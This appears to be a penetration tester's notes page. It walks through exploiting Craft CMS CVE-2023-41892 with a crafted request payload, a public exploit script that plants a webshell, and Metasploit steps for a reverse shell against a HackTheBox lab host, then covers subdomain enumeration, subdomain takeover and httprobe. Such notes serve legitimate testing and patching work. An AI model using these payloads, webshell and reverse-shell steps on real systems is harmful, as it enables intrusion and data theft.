[Exploitation](CVE-2023-41892) Craft CMS code execution (Unauthenticated)

Craft CMS could allow a remote authenticated attacker to execute arbitrary code on the system, caused by a flaw in the Craft installations. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class which allows to run arbitrary PHP code by escalating the object creation calling some methods available in `\GuzzleHttp\Psr7\FnStream`.

Using this vulnerability in combination with The Imagick Extension and MSL which stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that facilitates the reading of images, performance of image processing tasks, and writing of results back to the filesystem.

This can be leveraged to create a dummy image containing malicious PHP code using the Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious PHP code and gaining access to the system.

Affected Products

  • Craft CMS Craft CMS 4.4.14
  • affected at >= 4.0.0-RC1, <= 4.4.14

Identification

Wappalyzar

Source Code

  • curl http://website.com

  • curl http://website.com –i

HTTP headers (Proxy)

Manual (Proxy)

1. You can capture a HTTP request, and modify the data. Make sure the method is correct

  • action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}

2. The response should include the phpinfo() data

Exploitation (Script)

1. This vulnerability can be exploited using a script (https://github.com/Faelian/CraftCMS_CVE-2023-41892), download it using git

  • git clone https://github.com/Faelian/CraftCMS_CVE-2023-41892.git

2. Run craft-cms.py (sometimes you need to modify the source code for the webshell to be uploaded to a writable folder)

  • python3 craft-cms.py http://surveillance.htb

3. You can also run commands from shell.php (http://surveillance.htb/shell.php?cmd=whoami)

Important: remember to delete this file after your assessment. You can also upload a webshell having already the chance to execute commands.

Exploitation (Metasploit)

1. The exploit (craftcms_unauth_rce_cve_2023_41892) can be used to exploit this vulnerability and get a reverse shell

  • use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
  • show options

2. Set the options

  • set RHOSTS surveillance.htb
  • set LHOST tun0

3. (OPTIONAL) Modify the port and SSL, in my case the website was using port 80, without SSL

  • set RPORT 80
  • set SSL false

4. (OPTIONAL), set the function to inject our payload

  • set command system

5. Run the exploit

  • run

Remedy

Upgrade to the latest version of Craft CMS (3.8.15, 4.4.15 or later)

Besides applying the patch rotate the CRAFT_SECURITY_KEY immediately. knowing the key will lead to an unauthenticated RCE on a widely used CraftCMS plugin, and there may be more.

Reference

https://www.cve.org/CVERecord?id=CVE-2023-41892

https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g

https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857

https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e

https://github.com/craftcms/cms/commit/c0a37e15cc925c473e60e27fe64054993b867ac1

https://github.com/craftcms/cms/commit/c0a37e15cc925c473e60e27fe64054993b867ac1#diff-47dd43d86f85161944dfcce2e41d31955c4184672d9bd9d82b948c6b01b86476

https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical

https://packetstormsecurity.com/files/176303/Craft-CMS-4.4.14-Remote-Code-Execution.html

https://www.rapid7.com/db/modules/exploit/linux/http/craftcms_unauth_rce_cve_2023_41892/

https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226

[Active – Information Gathering] Finding Sub-Domains with AssetFinder

Find domains and subdomains potentially related to a given domain.

Installation

1. You need to install GoLang, alternatively you can use a script pimpmykali (https://github.com/Dewalt-arch/pimpmykali)

  • Choose: 3 - Fix Golang

2. If GoLang is already installed

  • apt install assetfinder

3. Display the help menu

  • assetfinder --help

How to use

1. You can set a domain to find all entries related to it. This option usually display a lot of unrelated records

  • assetfinder tesla.com
  • assetfinder <Domain>

2. To have some more accurate result use the (--subs-only) flag

  • assetfinder --subs-only tesla.com

[Active – Information Gathering] Finding Sub-Domains with Amass

The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.

Amass comes installed in the latest Kali Linux, if you need to install it follow the official guide

https://github.com/owasp-amass/amass/blob/master/doc/install.md

https://github.com/owasp-amass/amass/blob/master/doc/user_guide.md

How to use

1. Display help menu

  • amass -h

2. Enumerate for sub domains

  • amass enum -d tesla.com

Amass Intel

1. The amass intel gathers basic information against the target using various other tools, It find IPv4 IPv6 addr and basic whois informations.

  • amass intel -d owasp.org -whois

2. Using Amass, you have the option to search for organizational names. This search can yield ASN IDs that have been assigned to the target.

  • amass intel -org 'google'

We can see that we have retrieved asn numbers, Let’s try using the asn id against the target. Here the -active mean it choose the way it want to scan the target. It can be the google index or webmaster index and much more.

  • amass intel -active -asn 44384 -ip

Amass Enum

1. The enum option in amass will enumerate DNS services and also mapping around the network.

  • amass enum -passive -d google.com -src

2. We can also brute force the subdomains and try to get in, Let’s see how to do that ???? For EDUCATIONAL purpose only.

  • amass enum -active -d google.com -brute -w /usr/share/wordlists/amass/all.txt

Sources

https://techyrick.com/amass-full-tutorial/

https://github.com/owasp-amass/amass/blob/master/doc/tutorial.md

[Active – Information Gathering] Subdomain take over

Subjack is a Subdomain Takeover tool written in Go designed to scan a list of subdomains concurrently and identify ones that are able to be hijacked. With Go's speed and efficiency, this tool really stands out when it comes to mass-testing. Always double check the results manually to rule out false positives.

Subjack will also check for subdomains attached to domains that don't exist (NXDOMAIN) and are available to be registered. No need for dig ever again! This is still cross-compatible too.

Subdomain takeover vulnerabilities occur when a subdomain (subdomain.example.com) is pointing to a service (e.g. GitHub pages, Heroku, etc.) that has been removed or deleted. This allows an attacker to set up a page on the service that was being used and point their page to that subdomain. For example, if subdomain.example.com was pointing to a GitHub page and the user decided to delete their GitHub page, an attacker can now create a GitHub page, add a CNAME file containing subdomain.example.com, and claim subdomain.example.com.

https://github.com/haccer/subjack

There are several tools with dictionaries to check for possible takeovers:

Subdomain Takeover Generation via DNS Wildcard

When DNS wildcard is used in a domain, any requested subdomain of that domain that doesn't have a different address explicitly will be resolved to the same information. This could be an A ip address, a CNAME...

  • For example, if *.testing.com is wilcarded to 1.1.1.1. Then, not-existent.testing.com will be pointing to 1.1.1.1.

However, if instead of pointing to an IP address, the sysadmin point it to a third party service via CNAME, like a github subdomain for example (sohomdatta1.github.io). An attacker could create his own third party page (in Gihub in this case) and say that something.testing.com is pointing there. Because, the CNAME wildcard will agree the attacker will be able to generate arbitrary subdomains for the domain of the victim pointing to his pages.

Exploiting a subdomain takeover

Subdomain takeover is essentially DNS spoofing for a specific domain across the internet, allowing attackers to set A records for a domain, leading browsers to display content from the attacker's server. This transparency in browsers makes domains prone to phishing. Attackers may employ typosquatting or Doppelganger domains for this purpose. Especially vulnerable are domains where the URL in a phishing email appears legitimate, deceiving users and evading spam filters due to the domain's inherent trust.

SSL Certificates

SSL certificates, if generated by attackers via services like Let's Encrypt, add to the legitimacy of these fake domains, making phishing attacks more convincing.

Cookie Security and Browser Transparency

Browser transparency also extends to cookie security, governed by policies like the Same-origin policy. Cookies, often used to manage sessions and store login tokens, can be exploited through subdomain takeover. Attackers can gather session cookies simply by directing users to a compromised subdomain, endangering user data and privacy.

Emails and Subdomain Takeover

Another aspect of subdomain takeover involves email services. Attackers can manipulate MX records to receive or send emails from a legitimate subdomain, enhancing the efficacy of phishing attacks.

Higher Order Risks

Further risks include NS record takeover. If an attacker gains control over one NS record of a domain, they can potentially direct a portion of traffic to a server under their control. This risk is amplified if the attacker sets a high TTL (Time to Live) for DNS records, prolonging the duration of the attack.

Installation

1. Install subjack

  • go install github.com/haccer/subjack@latest

2. Display help menu

  • subjack -h

How to use

1. Find the fingerprints.json file

  • find -type f -name "fingerprints.json"

2. Run this tool against a subdomain list

  • subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl -c ./go/pkg/mod/github.com/haccer/subjack@v0.0.0-20201112041112-49c51e57deab/fingerprints.json -v 3

3. Save the output to a file

  • subjack -w ./Desktop/URL-list.txt -t 100 -timeout 30 -o results.txt -ssl -c ./go/pkg/mod/github.com/haccer/subjack@v0.0.0-20201112041112-49c51e57deab/fingerprints.json -v 3 -o results.txt

4. Search by single domain,or sub-domain

  • subjack -d dev.tesla.com -t 100 -timeout 30 -o results.txt -ssl -c ./go/pkg/mod/github.com/haccer/subjack@v0.0.0-20201112041112-49c51e57deab/fingerprints.json -v 3

Options

  • -d test.com if you want to test a single domain.
  • -w domains.txt is your list of subdomains.
  • -t is the number of threads (Default: 10 threads).
  • -timeout is the seconds to wait before timeout connection (Default: 10 seconds).
  • -o results.txt where to save results to. For JSON: -o results.json
  • -ssl enforces HTTPS requests which may return a different set of results and increase accuracy.
  • -a skips CNAME check and sends requests to every URL. (Recommended)
  • -m flag the presence of a dead record, but valid CNAME entry.
  • -v verbose. Display more information per each request.
  • -c Path to configuration file.

Mitigation

  • Removing vulnerable DNS records - This is effective if the subdomain is no longer required.
  • Claiming the domain name - Registering the resource with the respective cloud provider or repurchasing an expired domain.
  • Regular monitoring for vulnerabilities - Tools like aquatone can help identify susceptible domains. Organizations should also revise their infrastructure management processes, ensuring that DNS record creation is the final step in resource creation and the first step in resource destruction.

Sources

https://www.hackerone.com/application-security/guide-subdomain-takeovers

https://book.hacktricks.xyz/pentesting-web/domain-subdomain-takeover

https://github.com/EdOverflow/can-i-take-over-xyz

https://developer.mozilla.org/en-US/docs/Web/Security/Subdomain_takeovers

[Active – Information Gathering] Check alive URLs from a list using httprobe

Take a list of domains and probe for working http and https servers.

https://github.com/tomnomnom/httprobe

Installation

1. Download the tool

  • go install github.com/tomnomnom/httprobe@latest

2. Get help menu

  • httprobe -h

How to use

1. Run the tool against a file (HTTP & HTTPS)

  • cat URL-list.txt | httprobe

2. Check against HTTPS only

  • cat URL-list.txt | httprobe -s -p https:443

3. In order to filter by the domain & subdomain only

  • cat URL-list.txt | httprobe | sed 's/https\?:\/\///' | tr -d ":443"